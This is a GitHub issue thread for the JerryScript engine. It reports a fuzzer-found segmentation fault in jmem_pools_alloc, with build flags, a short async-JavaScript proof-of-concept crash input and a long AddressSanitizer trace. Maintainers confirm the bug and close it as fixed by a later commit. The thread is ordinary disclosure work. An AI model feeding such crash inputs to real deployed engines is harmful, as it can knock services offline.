jerryscript-project/jerryscript #4869: AddressSanitizer: SEGV on unknown address /home/sakura/jerryscript/jerry-core/jmem/jmem-poolman.c:77 in jmem_pools_alloc

eternalsakura, 2021-12-09:
## JerryScript commit hash
55acdf2048b390d0f56f12e64dbfb2559f0e70ad

## Build platform
Ubuntu 20.04 LTS

## Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es2015-subset --stack-limit=15
```

## poc
```
async function f() {
    var arr = [0.000000];
    f(fuzz_v43 *= false, arr);
    arr["findIndex"](f, new Object());
    arr.flat();
    await fuzz_v43;
    await fuzz_v43;
    var fuzz_v43 = "flat" >> true;
    await this;
    await arr;
    await new Promise(f);
    await arr["constructor"];
}
f();
```

## asan log
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==525238==ERROR: AddressSanitizer: SEGV on unknown address 0x00097fff8021 (pc 0x000000578727 bp 0x7ffc122d6c50 sp 0x7ffc122d6b10 T0)
==525238==The signal is caused by a READ memory access.
    #0 0x578727 in jmem_pools_alloc /home/sakura/jerryscript/jerry-core/jmem/jmem-poolman.c:77:59
    #1 0x502c1a in ecma_create_float_number /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:517:31
    #2 0x502c1a in ecma_make_number_value /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:590:10
    #3 0x5af9c3 in do_number_arithmetic /home/sakura/jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:117:17
    #4 0x5cbb22 in vm_loop /home/sakura/jerryscript/jerry-core/vm/vm.c:3574:20
    #5 0x5bcdd7 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5260:37
    #6 0x5bbdb8 in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363:10
    #7 0x540b8a in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203:28
    #8 0x5406dc in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439:16
    #9 0x5bd3b2 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763:5
    #10 0x5bd3b2 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266:9
    #11 0x5bbdb8 in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363:10
    #12 0x540b8a in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203:28
    #13 0x5406dc in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439:16
    #14 0x5bd3b2 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763:5
    #15 0x5bd3b2 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266:9
    #16 0x5bbdb8 in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363:10
    #17 0x540b8a in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203:28
    #18 0x5406dc in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439:16
    #19 0x5bd3b2 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763:5
    #20 0x5bd3b2 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266:9
    #21 0x5bbdb8 in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363:10
    #22 0x540b8a in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203:28
    #23 0x5406dc in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439:16
    #24 0x5bd3b2 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763:5
    #25 0x5bd3b2 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266:9
    #26 0x5bbdb8 in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363:10
    #27 0x540b8a in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203:28
    #28 0x5406dc in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439:16
    #29 0x5d93e4 in ecma_builtin_array_prototype_object_find /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2370:31
    #30 0x5d93e4 in ecma_builtin_array_prototype_dispatch_routine /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:3028:19
    #31 0x51d74c in ecma_builtin_dispatch_routine /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543:10
    #32 0x51d74c in ecma_builtin_dispatch_call /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574:12
    #33 0x540fde in ecma_op_function_call_native_built_in /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1244:5
    #34 0x5406a6 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444:16
[... 46 lines cut ...]
    #81 0x5bd3b2 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763:5
    #82 0x5bd3b2 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266:9
    #83 0x5bbdb8 in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363:10
    #84 0x540b8a in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203:28
    #85 0x5406dc in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439:16
    #86 0x55907b in ecma_promise_run_executor /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:449:25
    #87 0x55907b in ecma_op_create_promise_object /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:516:18
    #88 0x54171b in ecma_op_function_construct_built_in /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1585:28
    #89 0x54171b in ecma_op_function_construct /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1773:14
    #90 0x5bd1ad in opfunc_construct /home/sakura/jerryscript/jerry-core/vm/vm.c:845:7
    #91 0x5bd1ad in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5287:9
    #92 0x5b2e3b in opfunc_resume_executable_object /home/sakura/jerryscript/jerry-core/vm/opcodes.c:777:25
    #93 0x546392 in ecma_process_promise_async_reaction_job /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:365:12
    #94 0x546392 in ecma_process_all_enqueued_jobs /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:569:15
    #95 0x4cf14b in jerry_run_jobs /home/sakura/jerryscript/jerry-core/api/jerryscript.c:1064:24
    #96 0x4c5036 in main /home/sakura/jerryscript/jerry-main/main-jerry.c:326:15
    #97 0x7feba27570b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #98 0x41c5cd in _start (/home/sakura/jerryscript/build/bin/jerry+0x41c5cd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/sakura/jerryscript/jerry-core/jmem/jmem-poolman.c:77:59 in jmem_pools_alloc
==525238==ABORTING
                             

```

eternalsakura, 2021-12-09:
I have compiled and fuzzed according to the configuration you suggested. May I ask if this is correct?

rerobika, 2021-12-09:
We can state that's a valid issue.

gengjiawen, 2022-01-11:
@eternalsakura This looks disappear on master ?  @rerobika Any fix got merged forget mentioning this issue ?

rerobika, 2022-01-11:
@eternalsakura perhaps. Since we got several bug reports lately maybe one of them fixed this issue as well. @ossy-szeged please bisect it.

gengjiawen, 2022-01-11:
I tried with v8 using node.js

```console
RangeError: Maximum call stack size exceeded
Exception in PromiseRejectCallback:
/workspace/jerryscript/test.js:13
}
^
```

ossy-szeged, 2022-01-11:
42523bd6e2b114755498c9f68fd78545f9b33476 is the first commit where we get no error

rerobika, 2022-01-11:
Thanks, so we can prove that #4899 fixed that issue as well.

closed 2022-01-11 by rerobika